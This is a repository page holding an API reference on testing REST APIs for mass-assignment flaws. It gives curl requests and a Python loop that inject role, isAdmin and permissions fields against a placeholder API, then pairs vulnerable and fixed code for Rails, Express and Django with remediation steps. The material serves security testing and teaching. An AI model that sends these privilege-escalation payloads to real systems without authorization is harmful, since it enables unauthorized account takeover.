creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-12 14:14:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
d5f3fa32486ea335db802d68fe2147fa2da69583
Anthropic-Cybersecurity-Skills/skills/exploiting-mass-assignment-in-rest-apis/references/api-reference.md
T
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal 
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

2.4 KiB
Raw Blame History

API Reference: Mass Assignment Vulnerability Testing

OWASP API3:2023 — Broken Object Property Level Authorization

Description

API accepts and processes fields that should not be client-settable. Attackers add extra fields (role, isAdmin) to modify server-side properties.

Common Vulnerable Fields

Field Impact
role / isAdmin Privilege escalation
permissions Authorization bypass
verified / email_verified Account verification bypass
balance / credits Financial manipulation
plan / subscription Service tier elevation

Testing Methodology

Step 1: Observe Normal Request

curl -X PUT https://api.target.com/users/me \
    -H "Authorization: Bearer $TOKEN" \
    -d '{"name": "Test User"}'

Step 2: Add Privilege Fields

curl -X PUT https://api.target.com/users/me \
    -H "Authorization: Bearer $TOKEN" \
    -d '{"name": "Test User", "role": "admin", "isAdmin": true}'

Step 3: Verify Changes

curl https://api.target.com/users/me -H "Authorization: Bearer $TOKEN"

Python Testing Script

import requests

base_payload = {"name": "Test"}
privilege_fields = {
    "role": "admin",
    "isAdmin": True,
    "permissions": ["*"],
}

for field, value in privilege_fields.items():
    payload = {**base_payload, field: value}
    resp = requests.put(url, json=payload, headers=headers)
    if resp.status_code == 200 and field in resp.text:
        print(f"VULNERABLE: {field} accepted")

Framework-Specific Vulnerabilities

Ruby on Rails

# Vulnerable
User.new(params[:user])

# Fixed
User.new(params.require(:user).permit(:name, :email))

Node.js/Express

// Vulnerable
User.findByIdAndUpdate(id, req.body)

// Fixed
const { name, email } = req.body;
User.findByIdAndUpdate(id, { name, email })

Django REST Framework

# Vulnerable: all fields writable
class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = '__all__'

# Fixed: explicit fields
class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['name', 'email']
        read_only_fields = ['role', 'is_admin']

Remediation

  1. Use allowlists for acceptable fields (never blocklists)
  2. Implement read-only fields for sensitive properties
  3. Use separate DTOs for input and output
  4. Validate request schema against OpenAPI spec
Reference in New Issue View Git Blame Copy Permalink